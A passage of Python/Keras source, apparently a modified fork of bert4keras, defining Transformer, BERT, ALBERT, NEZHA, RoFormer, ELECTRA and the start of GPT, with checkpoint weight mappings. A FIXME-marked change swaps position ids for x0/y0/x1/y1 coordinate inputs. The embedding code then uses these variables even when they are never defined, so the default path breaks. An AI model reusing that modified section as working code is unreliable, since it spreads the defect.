self.sequence_length = sequence_length
self.keep_tokens = keep_tokens
self.compound_tokens = compound_tokens
self.attention_bias = None
self.position_bias = None
self.attention_scores = None
self.residual_attention_scores = residual_attention_scores
self.ignore_invalid_weights = ignore_invalid_weights
self.layers = {} if layers is None else layers
self.prefix = prefix or ''
self.name = name
self.built = False
def build(
self,
attention_caches=None,
layer_norm_cond=None,
layer_norm_cond_hidden_size=None,
layer_norm_cond_hidden_act=None,
additional_input_layers=None,
**kwargs
):
"""模型构建函数
attention_caches:为Attention的K,V的缓存序列字典,格式为
{Attention层名: [K缓存, V缓存]};
layer_norm_*系列参数:实现Conditional Layer Normalization时使用,
用来实现以“固定长度向量”为条件的条件Bert。
"""
if self.built:
return None
# Input
inputs = self.get_inputs()
self.set_inputs(inputs, additional_input_layers)
# Other
self.attention_caches = attention_caches or {}
self.layer_norm_conds = [
layer_norm_cond,
layer_norm_cond_hidden_size,
layer_norm_cond_hidden_act or 'linear',
]
# Call
outputs = self.call(inputs)
self.set_outputs(outputs)
# Model
self.model = Model(self.inputs, self.outputs, name=self.name)
self.built = True
def call(self, inputs):
"""定义模型的执行流程
"""
# Embedding
outputs = self.apply_embeddings(inputs)
# Main
for i in range(self.num_hidden_layers):
outputs = self.apply_main_layers(outputs, i)
# Final
outputs = self.apply_final_layers(outputs)
return outputs
def prefixed(self, name):
"""给名字加前缀
"""
if name is not None:
return self.prefix + name
def apply(self, inputs=None, layer=None, arguments=None, **kwargs):
"""通过apply调用层会自动重用同名层
inputs: 上一层的输出;
layer: 要调用的层类名;
arguments: 传递给layer.call的参数;
kwargs: 传递给层初始化的参数。
"""
if layer is Dropout and self.dropout_rate == 0:
return inputs
if layer is MultiHeadAttention and self.residual_attention_scores:
kwargs['return_attention_scores'] = True
arguments = arguments or {}
name = self.prefixed(kwargs.get('name'))
kwargs['name'] = name
if name not in self.layers:
layer = layer(**kwargs)
name = layer.name
self.layers[name] = layer
if inputs is None:
return self.layers[name]
else:
if isinstance(self.layers[name], MultiHeadAttention):
if name in self.attention_caches:
# 如果检测到Cache的传入,那么自动在Key,Value处拼接起来
k_cache, v_cache = self.attention_caches[name]
k_name, v_name = name + '-Cached-Key', name + '-Cached-Value'
k = Concatenate1D(name=k_name)([k_cache, inputs[1]])
v = Concatenate1D(name=v_name)([v_cache, inputs[2]])
inputs = inputs[:1] + [k, v] + inputs[3:]
if self.residual_attention_scores:
# 如果使用残差Attention矩阵,则给每个Attention矩阵加上前上一层的Attention
# 矩阵,这对应RealFormer设计(https://arxiv.org/abs/2012.11747)。目前
# 该实现还相对粗糙,可能欠缺通用性。
if self.attention_scores is not None:
if arguments.get('a_bias'):
a_bias = Add(name=name + '-Attention-Bias'
)([inputs[3], self.attention_scores])
inputs = inputs[:3] + [a_bias] + inputs[4:]
else:
a_bias = self.attention_scores
inputs = inputs[:3] + [a_bias] + inputs[3:]
arguments['a_bias'] = True
o, a = self.layers[name](inputs, **arguments)
self.attention_scores = a
return o
return self.layers[name](inputs, **arguments)
def get_inputs(self):
raise NotImplementedError
def apply_embeddings(self, inputs):
raise NotImplementedError
def apply_main_layers(self, inputs, index):
raise NotImplementedError
def apply_final_layers(self, inputs):
raise NotImplementedError
def compute_attention_bias(self, inputs=None):
"""定义每一层的Attention Bias
"""
return self.attention_bias
def compute_position_bias(self, inputs=None):
"""定义每一层的Position Bias(一般相对位置编码用)
"""
return self.position_bias
def set_inputs(self, inputs, additional_input_layers=None):
"""设置input和inputs属性
"""
if inputs is None:
inputs = []
elif not isinstance(inputs, list):
inputs = [inputs]
inputs = inputs[:]
if additional_input_layers is not None:
if not isinstance(additional_input_layers, list):
additional_input_layers = [additional_input_layers]
inputs.extend(additional_input_layers)
self.inputs = inputs
if len(inputs) > 1:
self.input = inputs
else:
self.input = inputs[0]
def set_outputs(self, outputs):
"""设置output和oututs属性
"""
if not isinstance(outputs, list):
outputs = [outputs]
outputs = outputs[:]
self.outputs = outputs
if len(outputs) > 1:
self.output = outputs
else:
self.output = outputs[0]
@property
def initializer(self):
"""默认使用截断正态分布初始化
"""
return keras.initializers.TruncatedNormal(stddev=0.02)
def simplify(self, inputs):
"""将list中的None过滤掉
"""
inputs = [i for i in inputs if i is not None]
if len(inputs) == 1:
inputs = inputs[0]
return inputs
def load_embeddings(self, embeddings):
"""处理Embedding层权重
"""
embeddings = embeddings.astype(K.floatx()) # 防止np.average报错
if self.keep_tokens is not None:
embeddings = embeddings[self.keep_tokens]
if self.compound_tokens is not None:
ext_embeddings = []
for item in self.compound_tokens:
if isinstance(item, list):
item = (item, [1] * len(item))
ext_embeddings.append(
np.average(embeddings[item[0]], 0, item[1])
)
embeddings = np.concatenate([embeddings, ext_embeddings], 0)
return embeddings
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
if isinstance(checkpoint, dict):
return checkpoint[name]
else:
return tf.train.load_variable(checkpoint, name)
def create_variable(self, name, value, dtype=None):
"""创建一个变量
"""
dtype = dtype or K.floatx()
return K.variable(
self.initializer(value.shape, dtype), dtype, name=name
), value
def variable_mapping(self):
"""构建keras层与checkpoint的变量名之间的映射表
"""
return {}
def load_weights_from_checkpoint(self, checkpoint, mapping=None):
"""根据mapping从checkpoint加载权重
"""
mapping = mapping or self.variable_mapping()
mapping = {self.prefixed(k): v for k, v in mapping.items()}
mapping = {k: v for k, v in mapping.items() if k in self.layers}
weight_value_pairs = []
for layer, variables in mapping.items():
layer = self.layers[layer]
weights, values = [], []
for w, v in zip(layer.trainable_weights, variables): # 允许跳过不存在的权重
try:
values.append(self.load_variable(checkpoint, v))
weights.append(w)
except Exception as e:
if self.ignore_invalid_weights:
print('%s, but ignored.' % e.message)
else:
raise e
if isinstance(layer, MultiHeadAttention):
"""如果key_size不等于head_size,则可以通过
正交矩阵将相应的权重投影到合适的shape。
"""
count = 2
if layer.use_bias:
count += 2
heads = self.num_attention_heads
head_size = self.attention_head_size
key_size = self.attention_key_size
W = np.linalg.qr(np.random.randn(key_size, head_size))[0].T
if layer.attention_scale:
W = W * key_size**0.25 / head_size**0.25
for w, v in zip(weights, values):
if is_one_of(w, layer.trainable_weights[:count]):
w_shape, v_shape = K.int_shape(w), v.shape
if w_shape[-1] != v_shape[-1]:
pre_shape = w_shape[:-1]
v = v.reshape(pre_shape + (heads, head_size))
v = np.dot(v, W)
v = v.reshape(pre_shape + (heads * key_size,))
values[weights.index(w)] = v
weight_value_pairs.extend(zip(weights, values))
K.batch_set_value(weight_value_pairs)
def save_weights_as_checkpoint(self, filename, mapping=None, dtype=None):
"""根据mapping将权重保存为checkpoint格式
"""
mapping = mapping or self.variable_mapping()
mapping = {self.prefixed(k): v for k, v in mapping.items()}
mapping = {k: v for k, v in mapping.items() if k in self.layers}
with tf.Graph().as_default():
all_variables, all_values = [], []
for layer, variables in mapping.items():
layer = self.layers[layer]
values = K.batch_get_value(layer.trainable_weights)
for name, value in zip(variables, values):
variable, value = self.create_variable(name, value, dtype)
all_variables.append(variable)
all_values.append(value)
with tf.Session() as sess:
K.batch_set_value(zip(all_variables, all_values))
saver = tf.train.Saver()
saver.save(sess, filename)
class LM_Mask(object):
"""定义下三角Attention Mask(语言模型用)
"""
def compute_attention_bias(self, inputs=None):
"""通过idxs序列的比较来得到对应的mask
"""
if self.attention_bias is None:
def lm_mask(s):
seq_len = K.shape(s)[1]
idxs = K.arange(0, seq_len)
mask = idxs[None, :] <= idxs[:, None]
mask = K.cast(mask, K.floatx())
return -(1 - mask[None, None]) * 1e12
self.attention_bias = self.apply(
inputs=self.inputs[0],
layer=Lambda,
function=lm_mask,
name='Attention-LM-Mask'
)
return self.attention_bias
class UniLM_Mask(object):
"""定义UniLM的Attention Mask(Seq2Seq模型用)
其中source和target的分区,由segment_ids来表示。
UniLM: https://arxiv.org/abs/1905.03197
"""
def compute_attention_bias(self, inputs=None):
"""通过idxs序列的比较来得到对应的mask
"""
if self.attention_bias is None:
def unilm_mask(s):
idxs = K.cumsum(s, axis=1)
mask = idxs[:, None, :] <= idxs[:, :, None]
mask = K.cast(mask, K.floatx())
return -(1 - mask[:, None]) * 1e12
self.attention_bias = self.apply(
inputs=self.inputs[1],
layer=Lambda,
function=unilm_mask,
name='Attention-UniLM-Mask'
)
return self.attention_bias
class BERT(Transformer):
"""构建BERT模型
"""
def __init__(
self,
max_position, # 序列最大长度
segment_vocab_size=2, # segment总数目
with_pool=False, # 是否包含Pool部分
with_nsp=False, # 是否包含NSP部分
with_mlm=False, # 是否包含MLM部分
hierarchical_position=None, # 是否层次分解位置编码
custom_position_ids=False, # 是否自行传入位置id
shared_segment_embeddings=False, # 若True,则segment跟token共用embedding
**kwargs # 其余参数
):
super(BERT, self).__init__(**kwargs)
self.max_position = max_position
self.segment_vocab_size = segment_vocab_size
self.with_pool = with_pool
self.with_nsp = with_nsp
self.with_mlm = with_mlm
self.hierarchical_position = hierarchical_position
self.custom_position_ids = custom_position_ids
self.shared_segment_embeddings = shared_segment_embeddings
if self.with_nsp and not self.with_pool:
self.with_pool = True
# FIXME: 修改了Bert模型的输入,加入了对应的x0,x1,y0,y1
def get_inputs(self):
"""BERT的输入是token_ids和segment_ids
(但允许自行传入位置id,以实现一些特殊需求)
"""
x_in = self.apply(
layer=Input, shape=(self.sequence_length,), name='Input-Token'
)
inputs = [x_in]
if self.segment_vocab_size > 0:
s_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-Segment'
)
inputs.append(s_in)
if self.custom_position_ids:
#p_in = self.apply(
# layer=Input,
# shape=(self.sequence_length,),
# name='Input-Position'
#)
#inputs.append(p_in)
x0_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-x0'
)
inputs.append(x0_in)
y0_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-y0'
)
inputs.append(y0_in)
x1_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-x1'
)
inputs.append(x1_in)
y1_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-y1'
)
inputs.append(y1_in)
return inputs
def apply_embeddings(self, inputs):
"""BERT的embedding是token、position、segment三者embedding之和
"""
inputs = inputs[:]
x = inputs.pop(0)
if self.segment_vocab_size > 0:
s = inputs.pop(0)
#if self.custom_position_ids:
# p = inputs.pop(0)
#else:
# p = None
if self.custom_position_ids:
x0 = inputs.pop(0)
y0 = inputs.pop(0)
x1 = inputs.pop(0)
y1 = inputs.pop(0)
else:
p = None
z = self.layer_norm_conds[0]
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
if self.segment_vocab_size > 0:
if self.shared_segment_embeddings:
name = 'Embedding-Token'
else:
name = 'Embedding-Segment'
s = self.apply(
inputs=s,
layer=Embedding,
input_dim=self.segment_vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
name=name
)
x = self.apply(
inputs=[x, s], layer=Add, name='Embedding-Token-Segment'
)
'''
x = self.apply(
inputs=self.simplify([x, p]),
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
custom_position_ids=self.custom_position_ids,
name='Embedding-Position'
)
'''
x = self.apply(
inputs=self.simplify([x, x0, y0, x1, y1]),
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
custom_position_ids=self.custom_position_ids,
name='Embedding-Position'
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Embedding-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""BERT的主体是基于Self-Attention的模块
顺序:Att --> Add --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
# Self Attention
xi, x, arguments = x, [x, x, x], {'a_bias': None}
if attention_mask is not None:
arguments['a_bias'] = True
x.append(attention_mask)
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
return x
def apply_final_layers(self, inputs):
"""根据剩余参数决定输出
"""
x = inputs
z = self.layer_norm_conds[0]
outputs = [x]
if self.with_pool:
# Pooler部分(提取CLS向量)
x = outputs[0]
x = self.apply(
inputs=x,
layer=Lambda,
function=lambda x: x[:, 0],
name='Pooler'
)
pool_activation = 'tanh' if self.with_pool is True else self.with_pool
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
activation=pool_activation,
kernel_initializer=self.initializer,
name='Pooler-Dense'
)
if self.with_nsp:
# Next Sentence Prediction部分
x = self.apply(
inputs=x,
layer=Dense,
units=2,
activation='softmax',
kernel_initializer=self.initializer,
name='NSP-Proba'
)
outputs.append(x)
if self.with_mlm:
# Masked Language Model部分
x = outputs[0]
x = self.apply(
inputs=x,
layer=Dense,
units=self.embedding_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name='MLM-Dense'
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='MLM-Norm'
)
x = self.apply(
inputs=x,
layer=Embedding,
arguments={'mode': 'dense'},
name='Embedding-Token'
)
x = self.apply(inputs=x, layer=BiasAdd, name='MLM-Bias')
mlm_activation = 'softmax' if self.with_mlm is True else self.with_mlm
x = self.apply(
inputs=x,
layer=Activation,
activation=mlm_activation,
name='MLM-Activation'
)
outputs.append(x)
if len(outputs) == 1:
outputs = outputs[0]
elif len(outputs) == 2:
outputs = outputs[1]
else:
outputs = outputs[1:]
return outputs
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(BERT, self).load_variable(checkpoint, name)
if name in [
'bert/embeddings/word_embeddings',
'cls/predictions/output_bias',
]:
return self.load_embeddings(variable)
elif name == 'cls/seq_relationship/output_weights':
return variable.T
else:
return variable
def create_variable(self, name, value, dtype=None):
"""在tensorflow中创建一个变量
"""
if name == 'cls/seq_relationship/output_weights':
value = value.T
return super(BERT, self).create_variable(name, value, dtype)
def variable_mapping(self):
"""映射到官方BERT权重格式
"""
mapping = {
'Embedding-Token': ['bert/embeddings/word_embeddings'],
'Embedding-Segment': ['bert/embeddings/token_type_embeddings'],
'Embedding-Position': ['bert/embeddings/position_embeddings'],
'Embedding-Norm': [
'bert/embeddings/LayerNorm/beta',
'bert/embeddings/LayerNorm/gamma',
],
'Embedding-Mapping': [
'bert/encoder/embedding_hidden_mapping_in/kernel',
'bert/encoder/embedding_hidden_mapping_in/bias',
],
'Pooler-Dense': [
'bert/pooler/dense/kernel',
'bert/pooler/dense/bias',
],
'NSP-Proba': [
'cls/seq_relationship/output_weights',
'cls/seq_relationship/output_bias',
],
'MLM-Dense': [
'cls/predictions/transform/dense/kernel',
'cls/predictions/transform/dense/bias',
],
'MLM-Norm': [
'cls/predictions/transform/LayerNorm/beta',
'cls/predictions/transform/LayerNorm/gamma',
],
'MLM-Bias': ['cls/predictions/output_bias'],
}
for i in range(self.num_hidden_layers):
prefix = 'bert/encoder/layer_%d/' % i
mapping.update({
'Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'attention/self/query/kernel',
prefix + 'attention/self/query/bias',
prefix + 'attention/self/key/kernel',
prefix + 'attention/self/key/bias',
prefix + 'attention/self/value/kernel',
prefix + 'attention/self/value/bias',
prefix + 'attention/output/dense/kernel',
prefix + 'attention/output/dense/bias',
],
'Transformer-%d-MultiHeadSelfAttention-Norm' % i: [
prefix + 'attention/output/LayerNorm/beta',
prefix + 'attention/output/LayerNorm/gamma',
],
'Transformer-%d-FeedForward' % i: [
prefix + 'intermediate/dense/kernel',
prefix + 'intermediate/dense/bias',
prefix + 'output/dense/kernel',
prefix + 'output/dense/bias',
],
'Transformer-%d-FeedForward-Norm' % i: [
prefix + 'output/LayerNorm/beta',
prefix + 'output/LayerNorm/gamma',
],
})
return mapping
class ALBERT(BERT):
"""构建ALBERT模型
"""
def apply_main_layers(self, inputs, index):
"""ALBERT的主体是基于Self-Attention的模块
顺序:Att --> Add --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-MultiHeadSelfAttention'
feed_forward_name = 'Transformer-FeedForward'
attention_mask = self.compute_attention_bias(index)
# Self Attention
xi, x, arguments = x, [x, x, x], {'a_bias': None}
if attention_mask is not None:
arguments['a_bias'] = True
x.append(attention_mask)
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
return x
def variable_mapping(self):
"""映射到官方ALBERT权重格式
"""
mapping = super(ALBERT, self).variable_mapping()
prefix = 'bert/encoder/transformer/group_0/inner_group_0/'
mapping.update({
'Transformer-MultiHeadSelfAttention': [
prefix + 'attention_1/self/query/kernel',
prefix + 'attention_1/self/query/bias',
prefix + 'attention_1/self/key/kernel',
prefix + 'attention_1/self/key/bias',
prefix + 'attention_1/self/value/kernel',
prefix + 'attention_1/self/value/bias',
prefix + 'attention_1/output/dense/kernel',
prefix + 'attention_1/output/dense/bias',
],
'Transformer-MultiHeadSelfAttention-Norm': [
prefix + 'LayerNorm/beta',
prefix + 'LayerNorm/gamma',
],
'Transformer-FeedForward': [
prefix + 'ffn_1/intermediate/dense/kernel',
prefix + 'ffn_1/intermediate/dense/bias',
prefix + 'ffn_1/intermediate/output/dense/kernel',
prefix + 'ffn_1/intermediate/output/dense/bias',
],
'Transformer-FeedForward-Norm': [
prefix + 'LayerNorm_1/beta',
prefix + 'LayerNorm_1/gamma',
],
})
return mapping
class ALBERT_Unshared(BERT):
"""解开ALBERT共享约束,当成BERT用
"""
def variable_mapping(self):
"""映射到官方ALBERT权重格式
"""
mapping = super(ALBERT_Unshared, self).variable_mapping()
prefix = 'bert/encoder/transformer/group_0/inner_group_0/'
for i in range(self.num_hidden_layers):
mapping.update({
'Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'attention_1/self/query/kernel',
prefix + 'attention_1/self/query/bias',
prefix + 'attention_1/self/key/kernel',
prefix + 'attention_1/self/key/bias',
prefix + 'attention_1/self/value/kernel',
prefix + 'attention_1/self/value/bias',
prefix + 'attention_1/output/dense/kernel',
prefix + 'attention_1/output/dense/bias',
],
'Transformer-%d-MultiHeadSelfAttention-Norm' % i: [
prefix + 'LayerNorm/beta',
prefix + 'LayerNorm/gamma',
],
'Transformer-%d-FeedForward' % i: [
prefix + 'ffn_1/intermediate/dense/kernel',
prefix + 'ffn_1/intermediate/dense/bias',
prefix + 'ffn_1/intermediate/output/dense/kernel',
prefix + 'ffn_1/intermediate/output/dense/bias',
],
'Transformer-%d-FeedForward-Norm' % i: [
prefix + 'LayerNorm_1/beta',
prefix + 'LayerNorm_1/gamma',
],
})
return mapping
class NEZHA(BERT):
"""华为推出的NAZHA模型
链接:https://arxiv.org/abs/1909.00204
"""
def apply_embeddings(self, inputs):
"""NEZHA的embedding是token、segment两者embedding之和
"""
inputs = inputs[:]
x = inputs.pop(0)
if self.segment_vocab_size > 0:
s = inputs.pop(0)
z = self.layer_norm_conds[0]
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
if self.segment_vocab_size > 0:
if self.shared_segment_embeddings:
name = 'Embedding-Token'
else:
name = 'Embedding-Segment'
s = self.apply(
inputs=s,
layer=Embedding,
input_dim=2,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
name=name
)
x = self.apply(
inputs=[x, s], layer=Add, name='Embedding-Token-Segment'
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Embedding-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""NEZHA的主体是基于Self-Attention的模块
顺序:Att --> Add --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
position_bias = self.compute_position_bias(x)
# Self Attention
xi, x = x, [x, x, x, position_bias]
arguments = {'a_bias': None, 'p_bias': 'typical_relative'}
if attention_mask is not None:
arguments['a_bias'] = True
x.insert(3, attention_mask)
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
return x
def compute_position_bias(self, inputs=None):
"""经典相对位置编码
"""
if self.position_bias is None:
x = inputs
self.position_bias = self.apply(
inputs=[x, x],
layer=RelativePositionEmbedding,
input_dim=2 * 64 + 1,
output_dim=self.attention_key_size,
embeddings_initializer='Sinusoidal',
name='Embedding-Relative-Position',
trainable=False
)
return self.position_bias
class RoFormer(NEZHA):
"""旋转式位置编码的BERT模型
链接:https://kexue.fm/archives/8265
"""
def apply_main_layers(self, inputs, index):
"""RoFormer的主体是基于Self-Attention的模块
顺序:Att --> Add --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
position_bias = self.compute_position_bias(x)
# Self Attention
xi, x = x, [x, x, x, position_bias]
arguments = {'a_bias': None, 'p_bias': 'rotary'}
if attention_mask is not None:
arguments['a_bias'] = True
x.insert(3, attention_mask)
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
return x
def compute_position_bias(self, inputs=None):
"""Sinusoidal位置编码(直接返回)
"""
if self.position_bias is None:
x = inputs
self.position_bias = self.apply(
inputs=x,
layer=SinusoidalPositionEmbedding,
output_dim=self.attention_key_size,
merge_mode='zero',
name='Embedding-Rotary-Position'
)
return self.position_bias
class ELECTRA(BERT):
"""Google推出的ELECTRA模型
链接:https://arxiv.org/abs/2003.10555
"""
@insert_arguments(with_discriminator=False)
@delete_arguments('with_pool', 'with_mlm')
def __init__(
self,
max_position, # 序列最大长度
**kwargs # 其余参数
):
super(ELECTRA, self).__init__(max_position, **kwargs)
def apply_final_layers(self, inputs):
x = inputs
if self.with_discriminator:
if self.with_discriminator is True:
final_activation = 'sigmoid'
else:
final_activation = self.with_discriminator
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name='Discriminator-Dense'
)
x = self.apply(
inputs=x,
layer=Dense,
units=1,
activation=final_activation,
kernel_initializer=self.initializer,
name='Discriminator-Prediction'
)
return x
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(ELECTRA, self).load_variable(checkpoint, name)
if name == 'electra/embeddings/word_embeddings':
return self.load_embeddings(variable)
else:
return variable
def variable_mapping(self):
mapping = super(ELECTRA, self).variable_mapping()
mapping['Embedding-Mapping'] = [
'electra/embeddings_project/kernel',
'electra/embeddings_project/bias',
]
mapping = {
k: [i.replace('bert/', 'electra/') for i in v]
for k, v in mapping.items()
}
mapping['Discriminator-Dense'] = [
'discriminator_predictions/dense/kernel',
'discriminator_predictions/dense/bias',
]
mapping['Discriminator-Prediction'] = [
'discriminator_predictions/dense_1/kernel',
'discriminator_predictions/dense_1/bias',
]
return mapping
class GPT(LM_Mask, BERT):
"""构建GPT模型
链接:https://github.com/openai/finetune-transformer-lm
"""
@insert_arguments(final_activation='softmax')
@delete_arguments('with_pool', 'with_mlm')
def __init__(self, **kwargs):
super(GPT, self).__init__(**kwargs)
def apply_embeddings(self, inputs):
"""GPT的embedding是token、position、segment三者embedding之和
跟BERT的主要区别是三者相加之后没有加LayerNormalization层。
"""
inputs = inputs[:]
x = inputs.pop(0)
if self.segment_vocab_size > 0:
s = inputs.pop(0)
if self.custom_position_ids:
p = inputs.pop(0)
else:
p = None
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
if self.segment_vocab_size > 0:
